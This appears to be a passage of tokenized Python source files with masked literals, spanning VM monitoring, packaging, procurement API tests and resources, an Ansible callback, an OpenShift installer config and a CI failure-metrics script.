) <EOL> time_was = roll_data ( '<STR_LIT>' % vm . ID ( ) , time_now , [ <NUM_LIT:0> ] * <NUM_LIT:6> ) <EOL> deltas = [ yi - xi for yi , xi in zip ( time_now , time_was ) ] <EOL> try : <EOL> cpu_pct = deltas [ <NUM_LIT:0> ] / float ( deltas [ <NUM_LIT:1> ] ) <EOL> except ZeroDivisionError : <EOL> cpu_pct = <NUM_LIT:0> <EOL> return cpu_pct <EOL> def memory_usage ( ) : <EOL> return vm . memoryStats ( ) [ '<STR_LIT>' ] / <NUM_LIT> <EOL> return { '<STR_LIT>' : cpu_usage ( ) , <EOL> '<STR_LIT>' : memory_usage ( ) , } <EOL> def compile_cleanup ( conn , vm ) : <EOL> domain = ET . fromstring ( vm . XMLDesc ( <NUM_LIT:0> ) ) <EOL> disk_elements = domain . findall ( '<STR_LIT>' ) <EOL> cleanup_list = [ ] <EOL> for disk in disk_elements : <EOL> if disk . attrib . 
get ( '<STR_LIT:type>' ) != '<STR_LIT:file>' or disk . attrib . get ( '<STR_LIT>' ) != '<STR_LIT>' : <EOL> continue <EOL> source = disk . find ( '<STR_LIT>' ) <EOL> if not source . attrib . get ( '<STR_LIT:file>' ) : <EOL> continue <EOL> if os . path . exists ( source . attrib . get ( '<STR_LIT:file>' ) ) : <EOL> cleanup_list . append ( source . attrib . get ( '<STR_LIT:file>' ) ) <EOL> return cleanup_list </s>
<s> from setuptools import setup <EOL> import re <EOL> with open ( '<STR_LIT>' , '<STR_LIT:r>' ) as fd : <EOL> version = re . search ( r'<STR_LIT>' , <EOL> fd . read ( ) , re . MULTILINE ) . group ( <NUM_LIT:1> ) <EOL> if not version : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = version , <EOL> description = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> classifiers = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) , <EOL> packages = [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> install_requires = [ "<STR_LIT>" ] , <EOL> include_package_data = True , <EOL> package_data = { <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT:*>' ] <EOL> } <EOL> ) </s>
<s> import unittest <EOL> from pyramid import testing <EOL> from openprocurement . api . auth import AuthenticationPolicy <EOL> from pyramid . tests . test_authentication import TestBasicAuthAuthenticationPolicy <EOL> from openprocurement . api . tests . base import test_tender_data , test_organization , BaseWebTest , BaseTenderWebTest <EOL> class AuthTest ( TestBasicAuthAuthenticationPolicy ) : <EOL> def _makeOne ( self , check ) : <EOL> return AuthenticationPolicy ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> test_authenticated_userid_utf8 = None <EOL> test_authenticated_userid_latin1 = None <EOL> def test_unauthenticated_userid_bearer ( self ) : <EOL> request = testing . DummyRequest ( ) <EOL> request . headers [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> policy = self . _makeOne ( None ) <EOL> self . assertEqual ( policy . unauthenticated_userid ( request ) , '<STR_LIT>' ) <EOL> class AccreditationTenderTest ( BaseWebTest ) : <EOL> def test_create_tender_accreditation ( self ) : <EOL> self . app . authorization = ( '<STR_LIT>' , ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> response = self . app . post_json ( '<STR_LIT>' , { "<STR_LIT:data>" : test_tender_data } ) <EOL> self . assertEqual ( response . status , '<STR_LIT>' ) <EOL> self . assertEqual ( response . content_type , '<STR_LIT:application/json>' ) <EOL> for broker in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> self . app . authorization = ( '<STR_LIT>' , ( broker , '<STR_LIT>' ) ) <EOL> response = self . app . post_json ( '<STR_LIT>' , { "<STR_LIT:data>" : test_tender_data } , status = <NUM_LIT> ) <EOL> self . assertEqual ( response . status , '<STR_LIT>' ) <EOL> self . assertEqual ( response . content_type , '<STR_LIT:application/json>' ) <EOL> self . assertEqual ( response . json [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ "<STR_LIT:description>" ] , "<STR_LIT>" ) <EOL> class AccreditationTenderQuestionTest ( BaseTenderWebTest ) : <EOL> def test_create_tender_question_accreditation ( self ) : <EOL> self . app . 
authorization = ( '<STR_LIT>' , ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> response = self . app . post_json ( '<STR_LIT>' . format ( self . tender_id ) , <EOL> { '<STR_LIT:data>' : { '<STR_LIT:title>' : '<STR_LIT>' , '<STR_LIT:description>' : '<STR_LIT>' , '<STR_LIT>' : test_organization } } ) <EOL> self . assertEqual ( response . status , '<STR_LIT>' ) <EOL> self . assertEqual ( response . content_type , '<STR_LIT:application/json>' ) <EOL> for broker in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> self . app . authorization = ( '<STR_LIT>' , ( broker , '<STR_LIT>' ) ) <EOL> response = self . app . post_json ( '<STR_LIT>' . format ( self . tender_id ) , <EOL> { '<STR_LIT:data>' : { '<STR_LIT:title>' : '<STR_LIT>' , '<STR_LIT:description>' : '<STR_LIT>' , '<STR_LIT>' : test_organization } } , <EOL> status = <NUM_LIT> ) <EOL> self . assertEqual ( response . status , '<STR_LIT>' ) <EOL> self . assertEqual ( response . content_type , '<STR_LIT:application/json>' ) <EOL> self . assertEqual ( response . json [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ "<STR_LIT:description>" ] , "<STR_LIT>" ) <EOL> class AccreditationTenderBidTest ( BaseTenderWebTest ) : <EOL> initial_status = '<STR_LIT>' <EOL> def test_create_tender_bid_accreditation ( self ) : <EOL> self . app . authorization = ( '<STR_LIT>' , ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> response = self . app . post_json ( '<STR_LIT>' . format ( self . tender_id ) , <EOL> { '<STR_LIT:data>' : { '<STR_LIT>' : [ test_organization ] , "<STR_LIT:value>" : { "<STR_LIT>" : <NUM_LIT> } } } ) <EOL> self . assertEqual ( response . status , '<STR_LIT>' ) <EOL> self . assertEqual ( response . content_type , '<STR_LIT:application/json>' ) <EOL> for broker in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> self . app . authorization = ( '<STR_LIT>' , ( broker , '<STR_LIT>' ) ) <EOL> response = self . app . post_json ( '<STR_LIT>' . format ( self . 
tender_id ) , <EOL> { '<STR_LIT:data>' : { '<STR_LIT>' : [ test_organization ] , "<STR_LIT:value>" : { "<STR_LIT>" : <NUM_LIT> } } } , <EOL> status = <NUM_LIT> ) <EOL> self . assertEqual ( response . status , '<STR_LIT>' ) <EOL> self . assertEqual ( response . content_type , '<STR_LIT:application/json>' ) <EOL> self . assertEqual ( response . json [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ "<STR_LIT:description>" ] , "<STR_LIT>" ) <EOL> def suite ( ) : <EOL> suite = unittest . TestSuite ( ) <EOL> suite . addTest ( unittest . makeSuite ( AuthTest ) ) <EOL> return suite <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( defaultTest = '<STR_LIT>' ) </s>
<s> from openprocurement . api . utils import ( <EOL> get_file , <EOL> save_tender , <EOL> upload_file , <EOL> apply_patch , <EOL> update_file_content_type , <EOL> opresource , <EOL> json_view , <EOL> context_unpack , <EOL> APIResource , <EOL> ) <EOL> from openprocurement . api . validation import ( <EOL> validate_file_update , <EOL> validate_file_upload , <EOL> validate_patch_document_data , <EOL> ) <EOL> @ opresource ( name = '<STR_LIT>' , <EOL> collection_path = '<STR_LIT>' , <EOL> path = '<STR_LIT>' , <EOL> procurementMethodType = '<STR_LIT>' , <EOL> description = "<STR_LIT>" ) <EOL> class TenderCancellationDocumentResource ( APIResource ) : <EOL> @ json_view ( permission = '<STR_LIT>' ) <EOL> def collection_get ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . request . params . get ( '<STR_LIT:all>' , '<STR_LIT>' ) : <EOL> collection_data = [ i . serialize ( "<STR_LIT>" ) for i in self . context . documents ] <EOL> else : <EOL> collection_data = sorted ( dict ( [ <EOL> ( i . id , i . serialize ( "<STR_LIT>" ) ) <EOL> for i in self . context . documents <EOL> ] ) . values ( ) , key = lambda i : i [ '<STR_LIT>' ] ) <EOL> return { '<STR_LIT:data>' : collection_data } <EOL> @ json_view ( validators = ( validate_file_upload , ) , permission = '<STR_LIT>' ) <EOL> def collection_post ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . request . validated [ '<STR_LIT>' ] in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> self . request . errors . add ( '<STR_LIT:body>' , '<STR_LIT:data>' , '<STR_LIT>' . format ( self . request . validated [ '<STR_LIT>' ] ) ) <EOL> self . request . errors . status = <NUM_LIT> <EOL> return <EOL> document = upload_file ( self . request ) <EOL> self . context . documents . append ( document ) <EOL> if save_tender ( self . request ) : <EOL> self . LOGGER . info ( '<STR_LIT>' . format ( document . id ) , <EOL> extra = context_unpack ( self . request , { '<STR_LIT>' : '<STR_LIT>' } , { '<STR_LIT>' : document . id } ) ) <EOL> self . 
request . response . status = <NUM_LIT> <EOL> document_route = self . request . matched_route . name . replace ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . request . response . headers [ '<STR_LIT>' ] = self . request . current_route_url ( _route_name = document_route , document_id = document . id , _query = { } ) <EOL> return { '<STR_LIT:data>' : document . serialize ( "<STR_LIT>" ) } <EOL> @ json_view ( permission = '<STR_LIT>' ) <EOL> def get ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . request . params . get ( '<STR_LIT>' ) : <EOL> return get_file ( self . request ) <EOL> document = self . request . validated [ '<STR_LIT>' ] <EOL> document_data = document . serialize ( "<STR_LIT>" ) <EOL> document_data [ '<STR_LIT>' ] = [ <EOL> i . serialize ( "<STR_LIT>" ) <EOL> for i in self . request . validated [ '<STR_LIT>' ] <EOL> if i . url != document . url <EOL> ] <EOL> return { '<STR_LIT:data>' : document_data } <EOL> @ json_view ( validators = ( validate_file_update , ) , permission = '<STR_LIT>' ) <EOL> def put ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . request . validated [ '<STR_LIT>' ] in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> self . request . errors . add ( '<STR_LIT:body>' , '<STR_LIT:data>' , '<STR_LIT>' . format ( self . request . validated [ '<STR_LIT>' ] ) ) <EOL> self . request . errors . status = <NUM_LIT> <EOL> return <EOL> document = upload_file ( self . request ) <EOL> self . request . validated [ '<STR_LIT>' ] . documents . append ( document ) <EOL> if save_tender ( self . request ) : <EOL> self . LOGGER . info ( '<STR_LIT>' . format ( self . request . context . id ) , <EOL> extra = context_unpack ( self . request , { '<STR_LIT>' : '<STR_LIT>' } ) ) <EOL> return { '<STR_LIT:data>' : document . serialize ( "<STR_LIT>" ) } <EOL> @ json_view ( content_type = "<STR_LIT:application/json>" , validators = ( validate_patch_document_data , ) , permission = '<STR_LIT>' ) <EOL> def patch ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . 
request . validated [ '<STR_LIT>' ] in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> self . request . errors . add ( '<STR_LIT:body>' , '<STR_LIT:data>' , '<STR_LIT>' . format ( self . request . validated [ '<STR_LIT>' ] ) ) <EOL> self . request . errors . status = <NUM_LIT> <EOL> return <EOL> if apply_patch ( self . request , src = self . request . context . serialize ( ) ) : <EOL> update_file_content_type ( self . request ) <EOL> self . LOGGER . info ( '<STR_LIT>' . format ( self . request . context . id ) , <EOL> extra = context_unpack ( self . request , { '<STR_LIT>' : '<STR_LIT>' } ) ) <EOL> return { '<STR_LIT:data>' : self . request . context . serialize ( "<STR_LIT>" ) } </s>
<s> '''<STR_LIT>''' <EOL> import time <EOL> class CallbackModule ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . stats = { } <EOL> self . current = None <EOL> def playbook_on_task_start ( self , name , is_conditional ) : <EOL> """<STR_LIT>""" <EOL> if self . current is not None : <EOL> self . stats [ self . current ] = time . time ( ) - self . stats [ self . current ] <EOL> self . current = name <EOL> self . stats [ self . current ] = time . time ( ) <EOL> def playbook_on_stats ( self , stats ) : <EOL> """<STR_LIT>""" <EOL> if self . current is not None : <EOL> self . stats [ self . current ] = time . time ( ) - self . stats [ self . current ] <EOL> results = sorted ( <EOL> self . stats . items ( ) , <EOL> key = lambda value : value [ <NUM_LIT:1> ] , <EOL> reverse = True , <EOL> ) <EOL> results = results [ : <NUM_LIT:10> ] <EOL> for name , elapsed in results : <EOL> print ( <EOL> "<STR_LIT>" . format ( <EOL> '<STR_LIT>' . format ( name ) , <EOL> '<STR_LIT>' . format ( elapsed ) , <EOL> ) <EOL> ) </s>
<s> import os <EOL> import yaml <EOL> from pkg_resources import resource_filename <EOL> PERSIST_SETTINGS = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:version>' , <EOL> ] <EOL> DEFAULT_REQUIRED_FACTS = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> PRECONFIGURED_REQUIRED_FACTS = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> class OOConfigFileError ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class OOConfigInvalidHostError ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class Host ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , ** kwargs ) : <EOL> self . ip = kwargs . get ( '<STR_LIT>' , None ) <EOL> self . hostname = kwargs . get ( '<STR_LIT>' , None ) <EOL> self . public_ip = kwargs . get ( '<STR_LIT>' , None ) <EOL> self . public_hostname = kwargs . get ( '<STR_LIT>' , None ) <EOL> self . connect_to = kwargs . get ( '<STR_LIT>' , None ) <EOL> self . preconfigured = kwargs . get ( '<STR_LIT>' , None ) <EOL> self . new_host = kwargs . get ( '<STR_LIT>' , None ) <EOL> self . master = kwargs . get ( '<STR_LIT>' , False ) <EOL> self . node = kwargs . get ( '<STR_LIT>' , False ) <EOL> self . master_lb = kwargs . get ( '<STR_LIT>' , False ) <EOL> self . storage = kwargs . get ( '<STR_LIT>' , False ) <EOL> self . containerized = kwargs . get ( '<STR_LIT>' , False ) <EOL> if self . connect_to is None : <EOL> raise OOConfigInvalidHostError ( "<STR_LIT>" "<STR_LIT>" ) <EOL> if self . master is False and self . node is False and self . master_lb is False and self . storage is False : <EOL> raise OOConfigInvalidHostError ( <EOL> "<STR_LIT>" ) <EOL> def __str__ ( self ) : <EOL> return self . connect_to <EOL> def __repr__ ( self ) : <EOL> return self . 
connect_to <EOL> def to_dict ( self ) : <EOL> """<STR_LIT>""" <EOL> d = { } <EOL> for prop in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> if getattr ( self , prop ) : <EOL> d [ prop ] = getattr ( self , prop ) <EOL> return d <EOL> def is_etcd_member ( self , all_hosts ) : <EOL> """<STR_LIT>""" <EOL> if not self . master : <EOL> return False <EOL> masters = [ host for host in all_hosts if host . master ] <EOL> if len ( masters ) > <NUM_LIT:1> : <EOL> return True <EOL> return False <EOL> def is_dedicated_node ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . node and not self . master <EOL> def is_schedulable_node ( self , all_hosts ) : <EOL> """<STR_LIT>""" <EOL> if not self . node : <EOL> return False <EOL> if not self . master : <EOL> return True <EOL> masters = [ host for host in all_hosts if host . master ] <EOL> nodes = [ host for host in all_hosts if host . node ] <EOL> if len ( masters ) == len ( nodes ) : <EOL> return True <EOL> return False <EOL> class OOConfig ( object ) : <EOL> default_dir = os . path . normpath ( <EOL> os . environ . get ( '<STR_LIT>' , <EOL> os . environ [ '<STR_LIT>' ] + '<STR_LIT>' ) + '<STR_LIT>' ) <EOL> default_file = '<STR_LIT>' <EOL> def __init__ ( self , config_path ) : <EOL> if config_path : <EOL> self . config_path = os . path . normpath ( config_path ) <EOL> else : <EOL> self . config_path = os . path . normpath ( self . default_dir + <EOL> self . default_file ) <EOL> self . settings = { } <EOL> self . _read_config ( ) <EOL> self . _set_defaults ( ) <EOL> def _read_config ( self ) : <EOL> self . hosts = [ ] <EOL> try : <EOL> if os . path . exists ( self . config_path ) : <EOL> cfgfile = open ( self . config_path , '<STR_LIT:r>' ) <EOL> self . settings = yaml . safe_load ( cfgfile . read ( ) ) <EOL> cfgfile . close ( ) <EOL> if '<STR_LIT>' in self . settings : <EOL> self . 
_upgrade_legacy_config ( ) <EOL> if '<STR_LIT>' in self . settings : <EOL> for host in self . settings [ '<STR_LIT>' ] : <EOL> self . hosts . append ( Host ( ** host ) ) <EOL> if '<STR_LIT>' in self . settings : <EOL> self . settings [ '<STR_LIT>' ] = str ( self . settings [ '<STR_LIT>' ] ) <EOL> except IOError , ferr : <EOL> raise OOConfigFileError ( '<STR_LIT>' . format ( ferr . filename , <EOL> ferr . strerror ) ) <EOL> except yaml . scanner . ScannerError : <EOL> raise OOConfigFileError ( <EOL> '<STR_LIT>' . format ( self . config_path ) ) <EOL> def _upgrade_legacy_config ( self ) : <EOL> new_hosts = [ ] <EOL> remove_settings = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:Name>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> if '<STR_LIT>' in self . settings : <EOL> for key , value in self . settings [ '<STR_LIT>' ] . iteritems ( ) : <EOL> value [ '<STR_LIT>' ] = key <EOL> if '<STR_LIT>' in self . settings and key in self . settings [ '<STR_LIT>' ] : <EOL> value [ '<STR_LIT>' ] = True <EOL> if '<STR_LIT>' in self . settings and key in self . settings [ '<STR_LIT>' ] : <EOL> value [ '<STR_LIT>' ] = True <EOL> new_hosts . append ( value ) <EOL> self . settings [ '<STR_LIT>' ] = new_hosts <EOL> for s in remove_settings : <EOL> if s in self . settings : <EOL> del self . settings [ s ] <EOL> self . settings [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> self . settings [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> def _set_defaults ( self ) : <EOL> if '<STR_LIT>' not in self . settings : <EOL> self . settings [ '<STR_LIT>' ] = self . _default_ansible_inv_dir ( ) <EOL> if not os . path . exists ( self . settings [ '<STR_LIT>' ] ) : <EOL> os . makedirs ( self . settings [ '<STR_LIT>' ] ) <EOL> if '<STR_LIT>' not in self . settings : <EOL> self . settings [ '<STR_LIT>' ] = resource_filename ( __name__ , '<STR_LIT>' ) <EOL> if '<STR_LIT:version>' not in self . settings : <EOL> self . 
settings [ '<STR_LIT:version>' ] = '<STR_LIT>' <EOL> if '<STR_LIT>' not in self . settings : <EOL> self . settings [ '<STR_LIT>' ] = '<STR_LIT>' % self . settings [ '<STR_LIT>' ] <EOL> if '<STR_LIT>' not in self . settings : <EOL> self . settings [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> self . settings [ '<STR_LIT>' ] = '<STR_LIT>' . format ( os . path . dirname ( self . config_path ) ) <EOL> for setting in self . settings . keys ( ) : <EOL> if not self . settings [ setting ] : <EOL> self . settings . pop ( setting ) <EOL> def _default_ansible_inv_dir ( self ) : <EOL> return os . path . normpath ( <EOL> os . path . dirname ( self . config_path ) + "<STR_LIT>" ) <EOL> def calc_missing_facts ( self ) : <EOL> """<STR_LIT>""" <EOL> result = { } <EOL> for host in self . hosts : <EOL> missing_facts = [ ] <EOL> if host . preconfigured : <EOL> required_facts = PRECONFIGURED_REQUIRED_FACTS <EOL> else : <EOL> required_facts = DEFAULT_REQUIRED_FACTS <EOL> for required_fact in required_facts : <EOL> if not getattr ( host , required_fact ) : <EOL> missing_facts . append ( required_fact ) <EOL> if len ( missing_facts ) > <NUM_LIT:0> : <EOL> result [ host . connect_to ] = missing_facts <EOL> return result <EOL> def save_to_disk ( self ) : <EOL> out_file = open ( self . config_path , '<STR_LIT:w>' ) <EOL> out_file . write ( self . yaml ( ) ) <EOL> out_file . close ( ) <EOL> def persist_settings ( self ) : <EOL> p_settings = { } <EOL> for setting in PERSIST_SETTINGS : <EOL> if setting in self . settings and self . settings [ setting ] : <EOL> p_settings [ setting ] = self . settings [ setting ] <EOL> p_settings [ '<STR_LIT>' ] = [ ] <EOL> for host in self . hosts : <EOL> p_settings [ '<STR_LIT>' ] . append ( host . to_dict ( ) ) <EOL> if self . settings [ '<STR_LIT>' ] != self . _default_ansible_inv_dir ( ) : <EOL> p_settings [ '<STR_LIT>' ] = self . settings [ '<STR_LIT>' ] <EOL> return p_settings <EOL> def yaml ( self ) : <EOL> return yaml . safe_dump ( self . 
persist_settings ( ) , default_flow_style = False ) <EOL> def __str__ ( self ) : <EOL> return self . yaml ( ) <EOL> def get_host ( self , name ) : <EOL> for host in self . hosts : <EOL> if host . connect_to == name : <EOL> return host <EOL> return None </s>
<s> import argparse <EOL> import collections <EOL> import logging <EOL> import operator <EOL> import os <EOL> import re <EOL> import time <EOL> from launchpadlib import launchpad <EOL> import elastic_recheck . elasticRecheck as er <EOL> import elastic_recheck . results as er_results <EOL> LPCACHEDIR = os . path . expanduser ( '<STR_LIT>' ) <EOL> def get_options ( ) : <EOL> parser = argparse . ArgumentParser ( <EOL> description = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , help = "<STR_LIT>" , <EOL> default = "<STR_LIT>" ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , help = "<STR_LIT>" , <EOL> type = bool , <EOL> default = False ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , help = "<STR_LIT>" , <EOL> type = bool , <EOL> default = True ) <EOL> return parser . parse_args ( ) <EOL> def all_fails ( classifier ) : <EOL> """<STR_LIT>""" <EOL> all_fails = { } <EOL> query = ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> results = classifier . hits_by_query ( query , size = <NUM_LIT> ) <EOL> facets = er_results . FacetSet ( ) <EOL> facets . detect_facets ( results , [ "<STR_LIT>" ] ) <EOL> for build in facets : <EOL> for result in facets [ build ] : <EOL> if re . search ( "<STR_LIT>" , result . project ) : <EOL> all_fails [ "<STR_LIT>" % ( build , result . build_name ) ] = False <EOL> return all_fails <EOL> def num_fails_per_build_name ( all_jobs ) : <EOL> counts = collections . defaultdict ( int ) <EOL> for f in all_jobs : <EOL> build , job = f . split ( '<STR_LIT:.>' , <NUM_LIT:1> ) <EOL> counts [ job ] += <NUM_LIT:1> <EOL> return counts <EOL> def classifying_rate ( fails , data ) : <EOL> """<STR_LIT>""" <EOL> for bugnum in data : <EOL> bug = data [ bugnum ] <EOL> for job in bug [ '<STR_LIT>' ] : <EOL> fails [ job ] = True <EOL> total = len ( fails . keys ( ) ) <EOL> bad_jobs = collections . 
defaultdict ( int ) <EOL> count = <NUM_LIT:0> <EOL> for f in fails : <EOL> if fails [ f ] is True : <EOL> count += <NUM_LIT:1> <EOL> else : <EOL> build , job = f . split ( '<STR_LIT:.>' , <NUM_LIT:1> ) <EOL> bad_jobs [ job ] += <NUM_LIT:1> <EOL> print ( "<STR_LIT>" % <EOL> ( ( float ( count ) / float ( total ) ) * <NUM_LIT> ) ) <EOL> sort = sorted ( <EOL> bad_jobs . iteritems ( ) , <EOL> key = operator . itemgetter ( <NUM_LIT:1> ) , <EOL> reverse = True ) <EOL> print ( "<STR_LIT>" ) <EOL> for s in sort : <EOL> print "<STR_LIT>" % ( s [ <NUM_LIT:1> ] , s [ <NUM_LIT:0> ] ) <EOL> def _status_count ( results ) : <EOL> counts = { } <EOL> facets = er_results . FacetSet ( ) <EOL> facets . detect_facets ( <EOL> results , <EOL> [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> for key in facets : <EOL> counts [ key ] = len ( facets [ key ] ) <EOL> return counts <EOL> def _failure_count ( hits ) : <EOL> if "<STR_LIT>" in hits : <EOL> return hits [ "<STR_LIT>" ] <EOL> else : <EOL> return <NUM_LIT:0> <EOL> def _failed_jobs ( results ) : <EOL> failed_jobs = [ ] <EOL> facets = er_results . FacetSet ( ) <EOL> facets . detect_facets ( <EOL> results , <EOL> [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> if "<STR_LIT>" in facets : <EOL> for build in facets [ "<STR_LIT>" ] : <EOL> for result in facets [ "<STR_LIT>" ] [ build ] : <EOL> failed_jobs . append ( "<STR_LIT>" % ( build , result . build_name ) ) <EOL> return failed_jobs <EOL> def _count_fails_per_build_name ( hits ) : <EOL> facets = er_results . FacetSet ( ) <EOL> counts = collections . defaultdict ( int ) <EOL> facets . 
detect_facets ( <EOL> hits , <EOL> [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> if "<STR_LIT>" in facets : <EOL> for build_name in facets [ "<STR_LIT>" ] : <EOL> counts [ build_name ] += <NUM_LIT:1> <EOL> return counts <EOL> def _failure_percentage ( hits , fails ) : <EOL> total_fails_per_build_name = num_fails_per_build_name ( fails ) <EOL> fails_per_build_name = _count_fails_per_build_name ( hits ) <EOL> per = { } <EOL> for build in fails_per_build_name : <EOL> this_job = fails_per_build_name [ build ] <EOL> if build in total_fails_per_build_name : <EOL> total = total_fails_per_build_name [ build ] <EOL> per [ build ] = ( float ( this_job ) / float ( total ) ) * <NUM_LIT> <EOL> return per <EOL> def collect_metrics ( classifier , fails ) : <EOL> data = { } <EOL> for q in classifier . queries : <EOL> start = time . time ( ) <EOL> results = classifier . hits_by_query ( q [ '<STR_LIT>' ] , size = <NUM_LIT> ) <EOL> log = logging . getLogger ( '<STR_LIT>' ) <EOL> log . debug ( "<STR_LIT>" % <EOL> ( time . time ( ) - start , q [ '<STR_LIT>' ] ) ) <EOL> hits = _status_count ( results ) <EOL> data [ q [ '<STR_LIT>' ] ] = { <EOL> '<STR_LIT>' : _failure_count ( hits ) , <EOL> '<STR_LIT>' : hits , <EOL> '<STR_LIT>' : _failure_percentage ( results , fails ) , <EOL> '<STR_LIT>' : q [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : _failed_jobs ( results ) <EOL> } <EOL> return data <EOL> def print_metrics ( data , with_lp = False ) : <EOL> print "<STR_LIT>" <EOL> print <EOL> sorted_data = sorted ( data . iteritems ( ) , <EOL> key = lambda x : - x [ <NUM_LIT:1> ] [ '<STR_LIT>' ] ) <EOL> for d in sorted_data : <EOL> bug = d [ <NUM_LIT:0> ] <EOL> data = d [ <NUM_LIT:1> ] <EOL> print ( "<STR_LIT>" <EOL> % ( bug , data [ '<STR_LIT>' ] . 
rstrip ( ) ) ) <EOL> if with_lp : <EOL> get_launchpad_bug ( d [ <NUM_LIT:0> ] ) <EOL> print "<STR_LIT>" <EOL> for s in data [ '<STR_LIT>' ] : <EOL> print "<STR_LIT>" % ( s , data [ '<STR_LIT>' ] [ s ] ) <EOL> print "<STR_LIT>" <EOL> for s in data [ '<STR_LIT>' ] : <EOL> print "<STR_LIT>" % ( s , data [ '<STR_LIT>' ] [ s ] ) <EOL> print <EOL> def get_launchpad_bug ( bug ) : <EOL> lp = launchpad . Launchpad . login_anonymously ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> LPCACHEDIR ) <EOL> lp_bug = lp . bugs [ bug ] <EOL> print "<STR_LIT>" % lp_bug . title <EOL> targets = map ( lambda x : ( x . bug_target_name , x . status ) , lp_bug . bug_tasks ) <EOL> print "<STR_LIT>" <EOL> for target , status in targets : <EOL> print "<STR_LIT>" % ( target , status ) <EOL> def main ( ) : <EOL> opts = get_options ( ) <EOL> classifier = er . Classifier ( opts . dir ) <EOL> fails = all_fails ( classifier ) <EOL> data = collect_metrics ( classifier , fails ) <EOL> print_metrics ( data , with_lp = opts . lp ) <EOL> if opts . rate : <EOL> classifying_rate ( fails , data ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
<s> import os <EOL> import fixtures <EOL> import testtools <EOL> from git_restack . tests import utils <EOL> class BaseGitRestackTestCase ( testtools . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( BaseGitRestackTestCase , self ) . setUp ( ) <EOL> self . useFixture ( fixtures . Timeout ( <NUM_LIT:2> * <NUM_LIT> , True ) ) <EOL> self . root_dir = self . useFixture ( fixtures . TempDir ( ) ) . path <EOL> self . upstream_dir = os . path . join ( self . root_dir , "<STR_LIT>" ) <EOL> self . local_dir = os . path . join ( self . root_dir , "<STR_LIT>" ) <EOL> os . makedirs ( self . _dir ( '<STR_LIT>' ) ) <EOL> self . _run_git ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . _simple_change ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . _simple_change ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . _run_git ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . _simple_change ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . 